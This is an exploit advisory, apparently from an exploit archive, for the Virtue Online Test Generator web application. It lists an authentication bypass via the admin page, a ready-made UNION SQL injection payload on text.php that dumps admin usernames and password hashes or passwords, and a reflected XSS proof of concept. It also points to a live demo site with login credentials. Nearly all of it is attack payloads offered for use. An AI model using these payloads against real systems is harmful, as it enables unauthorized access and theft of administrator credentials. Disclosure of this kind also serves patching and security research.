+===================================================================================+
| |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |
| |
+===================================================================================+
| |
| Author.: HxH |
| Contact: HxH[at]live[dot]at |
| |
+===================================================================================+
| |
| Script.: Virtue Online Test Generator |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php |
| |
+-----------------------------------------------------------------------------------+
| |
| Exploit: After user login |
| |
| [+] Auth Bypass |
| |
| http://[website]/[script]/admin/index.php |
| |
| [+] SQLi |
| |
| http://[website]/[script]/text.php?tid=[SQL] |
| |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |
| |
| [+] XSS |
| |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |
| |
+-----------------------------------------------------------------------------------+
| |
| Demo...: http://www.virtuenetz.com/exam |
| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo |
| |
+===================================================================================+
| |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |
| |
+===================================================================================+